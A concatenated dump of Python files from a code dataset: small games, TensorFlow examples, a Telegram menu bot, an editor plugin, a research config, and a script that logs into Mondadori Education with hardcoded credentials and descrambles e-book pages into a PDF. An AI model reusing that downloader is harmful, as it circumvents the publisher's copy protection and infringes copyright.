'__main__':\n game()\ncolorama.deinit()\ntime.sleep(2.4) \n \n\"\"\" \nMy Approach is that I will create a dictionary and each time a column is filed I will pass the column name and the value given to that column\nin the dictionary and while giving input I will check if that column is already filled and also the checking will be done using the dictionary.\nAlso the Colors of each Variable and the Arrows pointing to the current input column is given, the Warning situation such as If entered a column \nalready filled then it will give warning and choice to re-enter and if Choosed a variable which is not the same as choosed in the beginning\nit will give a Warning and choice to re-enter, and all the Warnings and choice to re-enter are given untill the Choice is True with the given Conditions,\nas mentioned before.The Player who takes the winning variable, his name gets displayed at the end while declearing the winner, and this is acheived \nby storing the variable choosed by each user at the beginning and then calling the key of the dictionary from the value. \n\"\"\"\n \n\n\n\n","sub_path":"TIC TAC TOE Project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":21241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"558363223","text":"from Tkinter import *\n\n\ndef quit():\n master.quit()\n\n\ndef instructions():\n global Instructions, Back_Button\n Instructions_Button.grid_remove()\n Play_Button.grid_remove()\n Quit_Button.grid_remove()\n Instructions = Label(master, wraplength=250, bg=\"#FFFFFF\",\n text=\"Use the arrow keys to move and rotate pieces, press space bar for quick drop. Try to for complete rows of blocks at the bottom (with no gaps). Each complete row will disappear, giving you more room to as you continue playing. Your game is over if the falling blocks pile up to the top of the playing area.\")\n Instructions.grid(row=1, column=0, padx=2, pady=20)\n Back_Button = Button(master, text=\"Back to Main Menu\", width=20, height=3, bg=\"#2196F3\", command=main_menu)\n Back_Button.grid(row=2, column=0, pady=25)\n\n\ndef main_menu():\n Instructions.grid_remove()\n Back_Button.grid_remove()\n Play_Button.grid()\n Instructions_Button.grid()\n Quit_Button.grid()\n\n\ndef play():\n master.destroy()\n execfile('Game.py', globals())\n\n\nmaster = Tk()\n\nmaster.configure(background=\"#FFFFFF\")\nw, h = 300, 400\nws = master.winfo_screenwidth() # width of the screen\nhs = master.winfo_screenheight() # height of the screen\n\nx = (ws / 4) - (w / 2)\ny = (hs / 2) - (h / 2)\n\nmaster.geometry('%dx%d+%d+%d' % (w, h, x, y))\n\ndisplayBarheight = 0.15 * h\nDisplayBar = Frame(master, bg=\"#2979ff\", height=displayBarheight, width=w).grid(row=0)\n\nTitle = Label(DisplayBar, text=\"Tetris!\", bg=\"#2979ff\", font=\"Verdana 18 bold\").grid(row=0, column=0)\n\nPlay_Button = Button(master, text=\"Play!\", width=20, height=3, bg=\"#2196F3\", command=play)\nInstructions_Button = Button(master, text=\"Instructions\", width=20, height=3, bg=\"#2196F3\", command=instructions)\nQuit_Button = Button(master, text=\"Quit\", width=20, height=3, bg=\"#2196F3\", command=quit)\nPlay_Button.grid(row=2, column=0, pady=25)\nInstructions_Button.grid(row=3, column=0, pady=25)\nQuit_Button.grid(row=4, column=0, pady=25)\n\nmaster.mainloop()\n","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"444821883","text":"# an example on how fetches work \n# To fetch the outputs of operations, execute the graph with a run() call on \n# the Session object and pass in the tensors to retrieve. \n# You can also fetch multiple tensors\nimport tensorflow as tf \n\ninput1 = tf.constant([3.0])\ninput2 = tf.constant([2.0])\ninput3 = tf.constant([5.0])\nintermed = tf.add(input2, input3)\nmul = tf.mul(input1, intermed)\n\nwith tf.Session() as sess:\n result = sess.run([mul, intermed])\n print(\"Result of fetches: {}\".format(result))\n","sub_path":"mnist_for_experts/tests/fetches.py","file_name":"fetches.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"183559329","text":"#!/usr/bin/env python3\ntry:\n num = int(input(\"Input number : \"))\nexcept ValueError:\n print(\"ValueError! Number must be integer!\")\nelse:\n if num % 3 == 0 :\n print('That is wonderful!')\n else :\n raise NameError(\"The number must be divide by 3!\")\n","sub_path":"nvard/python/#5/division_3.py","file_name":"division_3.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"308161834","text":"#!/etc/whatsonthemenu_bot/whatsonthemenuenv/bin/python\n# -*- coding: utf-8 -*-\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nfrom pdf2image import convert_from_path, convert_from_bytes\nimport logging\nimport requests\nimport shutil\nimport datetime\nimport os\nimport tempfile\n\n# Enable logging\nlogging.basicConfig(level=logging.INFO, filename='/etc/whatsonthemenu_bot/whatsonthemenuenv/whatsonthemenu.log', filemode='a',datefmt='%d.%m.%Y %H:%M:%S', format= '%(asctime)s - %(message)s')\n\nlogger = logging.getLogger(__name__)\n\n\n# Define a few command handlers. These usually take the two arguments bot and\n# update. Error handlers also receive the raised TelegramError object in error.\n\n\ndef start(bot, update):\n \"\"\"Send a message when the command /start is issued.\"\"\"\n\n chatidstr = str(chat_id)\n func = 'start'\n\n logger.info(chatidstr + ' - ' + func)\n\n update.message.reply_text('Hi!')\n\n\ndef help(bot, update):\n \"\"\"Send a message when the command /help is issued.\"\"\"\n\n chatidstr = str(chat_id)\n func = 'help'\n\n logger.info(chatidstr + ' - ' + func)\n\n update.message.reply_text('Help!')\n\ndef menu_mdc(bot, update):\n \"\"\"Send the MDC Menu when command /menu_mdc is issued\"\"\"\n chat_id = update.message.chat_id\n\n dest = '/etc/whatsonthemenu_bot/whatsonthemenuenv/menus/mdc.jpg'\n pdffile = '/etc/whatsonthemenu_bot/whatsonthemenuenv/menus/Speiseplan.pdf'\n url = 'https://www.bbb-berlin.de/pdf/Speiseplan.pdf'\n res = requests.get(url,verify=False)\n open(pdffile, 'wb').write(res.content)\n\n images = convert_from_path(pdffile)\n\n chatidstr = str(chat_id)\n func = 'menu_mdc'\n\n logger.info(chatidstr + ' - ' + func)\n\n for image in images:\n image.save(dest,'JPEG')\n bot.send_photo(chat_id=chat_id, photo=open(dest,'rb'))\n\ndef menu_kantine(bot,update):\n \"\"\"Send the Kantinen Menu when the command /menu_kantine is issued\"\"\"\n chat_id = update.message.chat_id\n weeknumber = datetime.date.today().isocalendar()[1]\n year = str(datetime.date.today().year)\n\n if weeknumber < 10:\n weeknumber = '0'+str(weeknumber)\n\n pdffile = '/etc/whatsonthemenu_bot/whatsonthemenuenv/menus/Speiseplan_Kantine.pdf'\n dest = '/etc/whatsonthemenu_bot/whatsonthemenuenv/menus/kantine.jpg'\n\n # cleaning the pics\n os.remove(dest)\n #errorpic = '/etc/whatsonthemenu_bot/whatsonthemenuenv/menus/menus_castle.jpg'\n urls = ['https://www.helios-gesundheit.de/fileadmin/UWS_Kliniken/Klinikum_Berlin-Buch/Ihr_Aufenthalt/Waehrend_des_Aufenthalts/Cafeteria/KW'+str(weeknumber)+'_'+year+'_HKBB_Speisenplan_Cafeteria.pdf','https://www.helios-gesundheit.de/fileadmin/UWS_Kliniken/Klinikum_Berlin-Buch/Ihr_Aufenthalt/Waehrend_des_Aufenthalts/Cafeteria/KW'+str(weeknumber)+'_'+year+'.pdf']\n\n chatidstr = str(chat_id)\n func = 'menu_kantine'\n\n logger.info(chatidstr + ' - ' + func)\n\n for url in urls:\n res = requests.get(url,verify=False)\n if res.status_code == 404:\n return\n else:\n open(pdffile, 'wb').write(res.content)\n\n images = convert_from_path(pdffile)\n\n for image in images:\n image.save(dest,'JPEG')\n bot.send_photo(chat_id=chat_id, photo=open(dest,'rb'))\n pass\n\n\ndef error(bot, update, error):\n \"\"\"Log Errors caused by Updates.\"\"\"\n logger.warning('Update \"%s\" caused error \"%s\"', update, error)\n\ndef main():\n \"\"\"Start the bot.\"\"\"\n # Create the EventHandler and pass it your bot's token.\n updater = Updater(\"APIKEY\")\n\n # Get the dispatcher to register handlers\n dp = updater.dispatcher\n\n # on different commands - answer in Telegram\n dp.add_handler(CommandHandler(\"start\", start))\n dp.add_handler(CommandHandler(\"help\", help))\n dp.add_handler(CommandHandler(\"menu_mdc\", menu_mdc))\n dp.add_handler(CommandHandler(\"menu_kantine\", menu_kantine))\n\n # log all errors\n dp.add_error_handler(error)\n\n # Start the Bot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n updater.idle()\n\nif __name__ == '__main__':\n main()\n","sub_path":"whatsonthemenubot.py","file_name":"whatsonthemenubot.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"557905987","text":"from abc import ABCMeta, abstractmethod\n\n\nclass Zoo(object):\n def __init__(self, name):\n self.name = name\n self.animals = []\n\n def add_animal(self, animal):\n if animal not in self.animals:\n setattr(self, animal.__class__.__name__, True)\n self.animals.append(animal)\n else:\n raise Exception(\"duplicated animal\")\n\n\nclass Animal(metaclass=ABCMeta):\n # def __init__(self):\n # raise Exception(\"Animal cls cant be initialized\")\n\n kind = None # 类型\n size = None # 体型\n character = None # 性格\n ferocity = None # ��猛动物\n\n @abstractmethod\n def is_ferocious(self):\n size_dict = {\"大\": 3, \"中等\": 2, \"小\": 1}\n if self.kind == \"食肉\" and size_dict[self.size] >= 2 and self.character == \"凶猛\":\n return True\n return False\n\n\nclass Cat(Animal):\n def __init__(self, name, kind, size, character):\n self.name = name\n self.kind = kind\n self.size = size\n self.character = character\n\n voice = \"miaomiaomiao\"\n\n @property\n def is_pet(self):\n return not self.is_ferocious\n\n @property\n def is_ferocious(self):\n size_dict = {\"大\": 3, \"中等\": 2, \"小\": 1}\n if self.kind == \"食肉\" and size_dict[self.size] >= 2 and self.character == \"凶猛\":\n return True\n return False\n\n\nclass Dog(Animal):\n def __init__(self, name, kind, size, character):\n self.name = name\n self.kind = kind\n self.size = size\n self.character = character\n\n voice = \"wangwangwang\"\n\n @property\n def is_pet(self):\n return not self.is_ferocious\n\n @property\n def is_ferocious(self):\n size_dict = {\"大\": 3, \"中等\": 2, \"小\": 1}\n if self.kind == \"食肉\" and size_dict[self.size] >= 2 and self.character == \"凶猛\":\n return True\n return False\n\n\n# 开始测试\nif __name__ == '__main__':\n # 实例化动物园\n z = Zoo('时间动物园')\n # 实例化一只猫,属性包括名字、类型、体型、性格\n cat1 = Cat('大花猫 1', '食肉', '小', '温顺')\n dog1 = Dog('大花狗 1', '食肉', '大', '凶猛')\n # 增加一只猫到动物园\n z.add_animal(cat1)\n # 动物园是否有猫这种动物\n have_cat = hasattr(z, 'Cat')\n have_dog = hasattr(z, 'Dog')\n print(f\"有猫吗?{have_cat}\")\n print(f\"有狗吗?{have_dog}\")\n print(f\"猫是宠物吗?{cat1.is_pet}\")\n print(f\"狗凶猛吗?{dog1.is_ferocious}\")\n # a = Animal() # Exception raised\n","sub_path":"week07/zoo.py","file_name":"zoo.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"416513307","text":"# boj 3003 킹, 퀸, 룩, 비숍, 나이트, 폰 b5\n# noj.am/3003\n\n# pypy3 최단시간 풀이\nchess = list(map(int, input().split()))\n_list = [1, 1, 2, 2, 2, 8]\nans = []\nfor i in range(len(_list) - 1, -1, -1):\n ans.append(_list[i] - chess.pop())\nprint(*reversed(ans))\n","sub_path":"Yeongseop-Song/baekjoon/3003.py","file_name":"3003.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"201069695","text":"\"\"\"Compile, run and lint files.\"\"\"\n\nimport dataclasses\nimport logging\nimport os\nimport pathlib\nimport shlex\nimport sys\nfrom functools import partial\nfrom typing import List, Optional\n\nif sys.version_info >= (3, 8):\n from typing import Literal\nelse:\n from typing_extensions import Literal\n\nfrom porcupine import get_tab_manager, menubar, tabs\n\nfrom . import no_terminal, terminal\n\nlog = logging.getLogger(__name__)\n\n\n@dataclasses.dataclass\nclass CommandsConfig:\n compile: str = ''\n run: str = ''\n lint: str = ''\n\n\ndef get_command(\n tab: tabs.FileTab,\n which_command: Literal['compile', 'run', 'lint'],\n basename: str,\n) -> Optional[List[str]]:\n assert os.sep not in basename, f\"{basename!r} is not a basename\"\n\n commands = tab.settings.get('commands', CommandsConfig)\n assert isinstance(commands, CommandsConfig)\n template = getattr(commands, which_command)\n if not template.strip():\n return None\n\n exts = ''.join(pathlib.Path(basename).suffixes)\n no_ext = pathlib.Path(basename).stem\n format_args = {\n 'file': basename,\n 'no_ext': no_ext,\n 'no_exts': basename[:-len(exts)] if exts else basename,\n 'python': 'py' if sys.platform == 'win32' else 'python3',\n 'exe': f'{no_ext}.exe' if sys.platform == 'win32' else f'./{no_ext}',\n }\n # TODO: is this really supposed to be shlex.split even on windows?\n result = [part.format(**format_args) for part in shlex.split(template)]\n return result\n\n\ndef do_something(something: Literal['compile', 'run', 'compilerun', 'lint']) -> None:\n tab = get_tab_manager().select()\n assert isinstance(tab, tabs.FileTab)\n\n tab.save()\n if tab.path is None:\n # user cancelled a save as dialog\n return\n\n workingdir = tab.path.parent\n basename = tab.path.name\n\n if something == 'run':\n command = get_command(tab, 'run', basename)\n if command is not None:\n terminal.run_command(workingdir, command)\n\n elif something == 'compilerun':\n def run_after_compile() -> None:\n assert isinstance(tab, tabs.FileTab)\n command = get_command(tab, 'run', basename)\n if command is not None:\n terminal.run_command(workingdir, command)\n\n compile_command = get_command(tab, 'compile', basename)\n if compile_command is not None:\n no_terminal.run_command(workingdir, compile_command, run_after_compile)\n\n else:\n command = get_command(tab, something, basename)\n if command is not None:\n no_terminal.run_command(workingdir, command)\n\n\ndef on_new_tab(tab: tabs.Tab) -> None:\n if isinstance(tab, tabs.FileTab):\n tab.settings.add_option('commands', CommandsConfig())\n\n\ndef setup() -> None:\n get_tab_manager().add_tab_callback(on_new_tab)\n\n menubar.get_menu(\"Run\").add_command(label=\"Compile\", command=partial(do_something, 'compile'))\n menubar.get_menu(\"Run\").add_command(label=\"Run\", command=partial(do_something, 'run'))\n menubar.get_menu(\"Run\").add_command(label=\"Compile and Run\", command=partial(do_something, 'compilerun'))\n menubar.get_menu(\"Run\").add_command(label=\"Lint\", command=partial(do_something, 'compilerun'))\n\n # TODO: disable the menu items when they don't correspond to actual commands\n for label in {\"Compile\", \"Run\", \"Compile and Run\", \"Lint\"}:\n menubar.set_enabled_based_on_tab(f\"Run/{label}\", (lambda tab: isinstance(tab, tabs.FileTab)))\n","sub_path":"porcupine/plugins/run/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"441525692","text":"import os\n\n\nclass clickMeConfig(object):\n def __init__(self, **kwargs):\n # Image directories\n self.clicktionary_dir = '/media/data_cifs/clicktionary/'\n self.image_base_path = os.path.join(\n self.clicktionary_dir, 'webapp_data')\n\n self.training_images = os.path.join(\n self.image_base_path, 'lmdb_trains')\n\n self.tf_train_name = 'clicks_only_train_7.tfrecords'\n # self.tf_train_name = 'full_imagenet_with_some_clicks_train_7.tfrecords'\n\n self.validation_images = os.path.join(\n self.image_base_path, 'lmdb_validations')\n # self.tf_val_name = 'imagenet_val.tfrecords'\n self.encode_clicktionary = True\n self.tf_val_name = 'clicktionary.tfrecords'\n\n self.clicktionary_validation_images = os.path.join(\n self.image_base_path, 'clickme_val_clicktionary')\n self.coco_validation_images = os.path.join(\n self.image_base_path, 'coco_overlap_lmdb_validations')\n self.coco_tf_val_name = 'coco_val.tfrecords'\n self.im_ext = '.JPEG'\n\n # Project file directories\n self.project_base_path = '/media/data_cifs/clicktionary/clickme_experiment'\n # self.project_base_path = '/home/drew/clickme/'\n # self.project_base_path = '/media/cifs_all/charlie/clickme/' \n self.tf_record_base = os.path.join(\n self.project_base_path, 'tf_records')\n # '/home/drew/clickme_tf_records/')\n self.results = os.path.join(self.project_base_path, 'results')\n self.train_checkpoint = os.path.join(\n self.project_base_path, 'attgrad_vgg_checkpoints')\n self.train_summaries = os.path.join(\n self.project_base_path, 'attgrad_vgg_summaries')\n\n\n # Image settings\n self.image_size = [256, 256, 3]\n self.click_box_radius = 7 # For human clickme observers: 7; for CNNs observers: 20\n self.viz_images = [\n '163_0.JPEG', '23_0.JPEG', '31_0.JPEG',\n '403_0.JPEG', '671_0.JPEG', '818_0.JPEG', '838_0.JPEG',\n '209_0.JPEG', '23_1.JPEG', '339_0.JPEG', '404_0.JPEG',\n '815_0.JPEG', '834_0.JPEG', '838_1.JPEG', '209_1.JPEG',\n '308_0.JPEG', '340_0.JPEG', '471_48043.JPEG', '817_0.JPEG',\n '837_0.JPEG', '838_2.JPEG']\n self.viz_images = [os.path.join(\n self.project_base_path, 'test_images', x) for x in self.viz_images]\n self.hm_scoring = 'uniform' # linear_decrease/uniform/linear_increase\n self.investigate_subjects = ['r1Ieyvtax', 'B1x-611pl', 'HkJm9Skwx', 'BJEVHkW6l', 'B1qskZbOg', 'By1TONCsg'] # relive_this@live.com ; ['rykyZPzTl'], freemoneyq ['rJkI8aOox'], # 'BklslAOgb', HJy2nW9k 'r1Ieyvtax', 'B1x-611pl'\n self.consolidation_type = 'both' # clicks, consolidated, or both\n self.click_syn_file = os.path.join(self.clicktionary_dir, 'clicktionary_image_categories.txt')\n with open(self.click_syn_file) as f:\n content = f.readlines()\n self.heatmap_image_dict = {\n v.split(' ')[0]: int(\n v.split(' ')[1].strip('\\n')) for v in content}\n\n # Model settings\n self.vgg16_weight_path = os.path.join(\n self.clicktionary_dir, 'pretrained_weights', 'vgg16.npy')\n self.train_batch = 32\n self.validation_batch = 20\n\n # validation_batch * num_validation_evals is num of val images to test\n self.num_validation_evals = 10\n self.validation_iters = 500 # test validation every this # of steps\n self.epochs = 200 # Increase since we are augmenting\n self.top_n_validation = 0 # set to 0 to save all\n self.model_image_size = [224, 224, 3]\n self.output_shape = 1000 # how many categories for classification\n # choose from ['conv5_1', 'fc6', 'conv5_3', 'fc7', 'fc8', 'conv5_2',\n # 'conv4_1', 'conv4_2', 'conv4_3', 'conv3_3', 'conv3_2',\n # 'conv3_1', 'conv1_1', 'conv1_2', 'conv2_2', 'conv2_1']\n self.fine_tune_layers = ['fc6', 'fc7', 'fc8']\n self.initialize_layers = ['fc6', 'fc7', 'fc8'] # must be in fine_tune_layers\n self.wd_layers = ['fc6', 'fc7', 'fc8']\n self.batchnorm_layers = ['fc6', 'fc7', 'fc8'] # ['fc6', 'fc7', 'fc8'] # ['fc6', 'fc7', 'fc8'] # ['fc6', 'fc7', 'fc8']\n self.optimizer = 'adam' # 'adam' 'sgd'\n self.hold_lr = 1e-8 # 1e-8\n self.new_lr = 3e-4 # 1e-6\n self.keep_checkpoints = 60 # max # of checkpoints\n self.grad_clip = False\n self.weight_loss_with_counts = True\n self.reweighting = 'uniform' # if above is true, 'uniform' or 'counts'\n\n # Attention settings\n self.attention_layers = ['fc8'] # [\n # self.attention_layers = ['conv1_2', 'conv2_1', 'conv3_1',\n # 'conv4_1', 'conv5_1'] # [\n # 'conv1_2', 'conv2_2', 'conv3_3', 'conv4_3', 'conv5_3']\n self.attention_type = 'activation' # 'gradient', 'activation', 'lrp'\n self.combine_type = 'sum_abs' # 'pass' 'sum_abs' 'sum_p' 'max_p'\n self.plot_gradients = True\n self.loss_function = 'l2' # 'l2' or 'huber' 'log_loss' 'masked_l2'\n self.attention_loss = 'l2'\n self.normalize = 'l2' # 'l2 or z or 'softmax' or sigmoid or none\n self.reg_penalty = 0.1 # 0.001 # 0.01 #0.05 # 0.01\n self.wd_penalty = None # 5e-5\n self.loss_type = 'joint' # 'joint'\n self.targeted_gradient = True # True # Requires attention_layers = ['fc8']\n self.heatmap_blur_maps = 49 # 0 = no, > 0 blur kernel\n self.gradient_blur_maps = 49 # 30 # 0 = no, > 0 blur kernel\n\n # choose from: random_crop\n self.data_augmentations = [\n 'random_crop',\n 'left_right',\n 'random_contrast', # 'random_brightness'\n ]\n\n ######\n # Visualization settings\n ######\n\n # Directory with images for heatmaps\n self.heatmap_dataset_images = os.path.join(\n '/home/andreas/charlie', 'images_for_heatmaps')\n self.restore_model = None # '/media/data_cifs/clicktionary/clickme_experiment/checkpoints/gradient_001_112341_2017_05_16_16_20_26/model_18000.ckpt-18000'\n self.heatmap_image_labels = '/home/andreas/charlie/MIRC_behavior/exp_3_all_images_no_mircs'\n\n # Images for visualization parameters\n # > 0 = number of images, < 0 = proportion of images\n self.heatmap_image_amount = 1000\n self.heatmap_batch = 1\n\n # Bubbles parameters\n self.visualization_output = '/home/andreas/charlie/MIRC_behavior/click_comparisons/heatmaps_for_paper/clickme_bubbles_exp_3_baseline'\n self.generate_plots = True\n self.use_true_label = True\n self.block_size = 14\n self.block_stride = 1\n self.log_gradients = False # Whether to log the gradients and weights as we train the network\n\n # update attributes\n self.__dict__.update(kwargs)\n\n\nclass InceptionConfig(clickMeConfig):\n '''\n This config inherits from the above config, and deals with Inception V3 model details. All other\n stuff (data paths, attention gradient combination/loss parameters,\n optimizer stuff, etc) is handled by `clickMeConfig` up there (and inherited by this config)\n '''\n def __init__(self, **kwargs):\n # Instantiate the parent class variables\n super(InceptionConfig, self).__init__(**kwargs)\n from ops.map_loss import MapLoss\n # Don't restore vars in these scopes from the checkpoint\n self.exclude_scopes = ['InceptionV3/Mixed_7a', 'InceptionV3/Mixed_7a', 'InceptionV3/Mixed_7a', 'InceptionV3/Logits', 'InceptionV3/AuxLogits']\n # Only finetune layers in these scopes\n self.trainable_scopes = ['InceptionV3/Mixed_7a', 'InceptionV3/Mixed_7a', 'InceptionV3/Mixed_7a', 'InceptionV3/Logits'] # 'InceptionV3/AuxLogits'\n # Load model from here\n # self.pretrained_ckpt = '/media/data_cifs/clickme/baseline_inception_checkpoints/inception_v3.ckpt'\n self.pretrained_ckpt = os.path.join(self.project_base_path,\n 'baseline_inception_checkpoints/inception_v3.ckpt')\n\n # For training\n self.dropout_keep_prob = 0.8\n self.weight_decay = 0.00004\n self.stddev = 0.1\n # Global weight for clickmap loss\n self.beta = 1\n # Used to compute the per-clickmap weight\n self.max_clicks = 200\n # Target attention loss to neuron for class\n self.targeted = True\n self.loss_type = MapLoss.PEARSON\n\n self.__dict__.update(kwargs)\n\n\nclass DeepGazeConfig():\n '''\n This config only deals with Deep Gaze II model details. All other\n stuff (data paths, attention gradient combination/loss parameters,\n optimizer stuff, etc) is handled by `clickMeConfig` up there.\n '''\n def __init__(self, **kwargs):\n # Load model from here\n self.pretrained_vgg19_ckpt = '/media/cifs_all/charlie/clickme/deepgaze_ii_checkpoints/vgg_19.ckpt'\n\n # This directory should have a bunch of .JPEGs and .npys (n of each)\n self.raw_validation_dir = '/media/cifs_all/charlie/clickme/raw_validation_data/'\n\n\n self.new_lr = 1e-5 # 1e-6\n\n self.training_images = os.path.join(\n self.image_base_path, 'lmdb_trains')\n\n ######## TODO: REMOVE THIS ######\n self.num_validation_evals = 100\n self.tf_train_name = 'full_imagenet_with_some_clicks_train_7.tfrecords'\n ######## TODO: REMOVE THIS ######\n self.__dict__.update(kwargs)\n\n\nclass Fcn8Config(clickMeConfig):\n '''\n This config inherits from the above config, and deals with FCN8 model details. All other\n stuff (data paths, attention gradient combination/loss parameters,\n optimizer stuff, etc) is handled by `clickMeConfig` up there (and inherited by this config)\n '''\n def __init__(self, **kwargs):\n super(Fcn8Config, self).__init__(**kwargs) # Instantiate the parent class variables\n\n\n\n self.validation_images_clicks_only = os.path.join(\n self.image_base_path, 'clicktionary_exp_123_images_256')\n self.validation_heatmaps_clicks_only = os.path.join(\n self.image_base_path, 'clicktionary_exp_123_heatmaps_256')\n\n\n self.train_batch_heatmap_prediction = 32\n self.validation_batch_heatmap_prediction = 32\n self.validation_iters = 200 # test validation every this # of steps\n self.tf_train_name_clicks_only = 'clicks_only_train_7.tfrecords'\n self.tf_val_name_clicks_only = 'clicks_only_val_7.tfrecords'\n\n\n\n\n self.num_validation_evals = 10\n self.wd_penalty = 5e-7 # 5e-5\n self.heatmap_blur_maps = 60 # 0 = no, > 0 blur kernel\n self.heatmap_prediction_loss_function = \"log_loss\"\n\n\n self.pretrained_ckpt = \"/media/data_cifs/clicktionary/clickme_experiment/fcn8_checkpoints/fcn8_baseline.ckpt\"\n\n self.train_checkpoint = os.path.join(\n self.project_base_path, 'fcn8_checkpoints')\n\n\n\n\n # self.fcn8_restore_strategy = \"restore_conv_hold_conv\" \n #self.fcn8_restore_strategy = \"restore_conv_fcn_hold_nothing\" \n #self.fcn8_restore_strategy = \"restore_conv_fcn_hold_conv_fcn\" \n self.fcn8_restore_strategy = \"restore_conv_fcn_hold_conv\" \n\n\n\n\n self.fcn8_weight_path = \"/media/data_cifs/fcn8_inits/fcn8_pascal_lite.npy\"\n\n\n\n\n def determine_var_restoration(self):\n convs = [\"cnn/conv1_1/filter\", \"cnn/conv1_1/biases\", \"cnn/conv1_2/filter\", \"cnn/conv1_2/biases\", \n \"cnn/conv2_1/filter\", \"cnn/conv2_1/biases\", \"cnn/conv2_2/filter\", \"cnn/conv2_2/biases\",\n \"cnn/conv3_1/filter\", \"cnn/conv3_1/biases\", \"cnn/conv3_2/filter\", \"cnn/conv3_2/biases\", \n \"cnn/conv3_3/filter\", \"cnn/conv3_3/biases\",\"cnn/conv4_1/filter\", \"cnn/conv4_1/biases\", \n \"cnn/conv4_2/filter\", \"cnn/conv4_2/biases\", \"cnn/conv4_3/filter\", \"cnn/conv4_3/biases\",\n \"cnn/conv5_1/filter\", \"cnn/conv5_1/biases\", \"cnn/conv5_2/filter\", \"cnn/conv5_2/biases\",\n \"cnn/conv5_3/filter\", \"cnn/conv5_3/biases\"]\n fcns = [\"cnn/fc6/weights\", \"cnn/fc6/biases\", \"cnn/fc7/weights\", \"cnn/fc7/biases\"]\n\n if self.fcn8_restore_strategy == \"scratch\":\n # Train the network from scratch\n self.restore_and_hold_vars = []\n self.restore_and_dont_hold_vars = []\n\n elif self.fcn8_restore_strategy == \"restore_conv_fcn_hold_nothing\":\n # Restore the conv and fcn variables and hold nothing\n self.restore_and_hold_vars = []\n self.restore_and_dont_hold_vars = convs + fcns\n\n elif self.fcn8_restore_strategy == \"restore_conv_hold_conv\":\n # Restore the conv and variables and hold only the conv variables\n self.restore_and_hold_vars = convs\n self.restore_and_dont_hold_vars = []\n\n elif self.fcn8_restore_strategy == \"restore_conv_fcn_hold_conv\":\n # Restore the conv and fcn variables and hold the conv\n self.restore_and_hold_vars = convs\n self.restore_and_dont_hold_vars = fcns\n\n elif self.fcn8_restore_strategy == \"restore_conv_fcn_hold_conv_fcn\":\n # Restore the conv and fcn variables and hold the conv and fcn variables\n self.restore_and_hold_vars = convs + fcns\n self.restore_and_dont_hold_vars = []\n else:\n assert False, (self.fcn8_restore_strategy)\n\n\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":13510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"154289782","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom PIL import Image\nimport PIL\nimport Tkinter\nimport tkMessageBox\nimport requests\nimport re\nimport threading\nimport io\nimport PyPDF2\n\ndef start():\n\tlogbox.delete(0, Tkinter.END)\n\tisbn_entry.configure(state='disabled')\n\tstart_button.configure(state='disabled')\n\tthreading.Thread(target=engine).start()\n\ndef engine():\n\tisbn = isbn_value.get()\n\tif len(isbn)!=12:\n\t\ttkMessageBox.showerror(\"Errore\", \"La lunghezza del codice ISBN deve essere pari a 12!\", icon='error')\n\t\tisbn_entry.configure(state='normal')\n\t\tstart_button.configure(state='normal')\n\tresult = tkMessageBox.askquestion(\"Conferma\", \"Sicuro di voler scaricare questo libro?\\n\\nISBN: \"+isbn, icon='question')\n\tif result != 'yes':\n\t\tisbn_entry.configure(state='normal')\n\t\tstart_button.configure(state='normal')\n\n\tdef decrypt(data, page):\n\t\tdata=data.replace('viewer._imgl('+str(page)+',\"','').replace('\");\\nviewer._imgl('+str(page)+');','')\n\t\tdata=data.decode('string_escape')\n\t\tm=\"fb69218f41737d7da84b1e39a949dbc2\"\n\t\tarr=list(data)\n\t\tfor j in range(3):\n\t\t\tfor i in range(95,-1,-1):\n\t\t\t\tnewpos=ord(m[i % 32]) % 96\n\t\t\t\tf=arr[i]\n\t\t\t\ts=arr[newpos]\n\t\t\t\tarr[i]=s\n\t\t\t\tarr[newpos] = f\n\t\tdata=''.join(arr)\n\t\treturn data\n\n\tdef download(username, isbn, pagen):\n\t\tpageid=\"0\"*(3-len(str(pagen)))+str(pagen)\n\t\ttry:\n\t\t\tcontent=session.get(\"http://iflipit.mondadorieducation.it/desktop/index.php?usr=\"+username+\"&iss=\"+isbn+\"&fld=sdf&id=\"+pageid+\"&ext=js\").content\n\t\texcept:\n\t\t\tdownload(username,isbn,pagen)\n\t\t\treturn\n\t\tdata=decrypt(content,pagen)\n\t\tpdf = io.BytesIO()\n\t\tPIL.Image.Image.save(PIL.Image.open(io.BytesIO(data)), pdf, \"PDF\", resoultion=100.0)\n\t\tpdf_data[pagen] = pdf.getvalue()\n\t\t\n\tlogbox.insert(Tkinter.END, \"Inizializzazione\")\n\tsession = requests.Session()\n\n\tlogbox.insert(Tkinter.END, \"Login\")\n\temail = \"IxPRCeyG@trashcanmail.com\"\n\tpassword = \"q1w2e3r4\"\n\thtml=session.get(\"https://www.mondadorieducation.it/app/mondadorieducation/login/loginJsonp?username=\"+email+\"&password=\"+password+\"&format=json&jsoncallback=jsonp11\").text\n\t\n\tif not '\"result\":\"OK\"' in 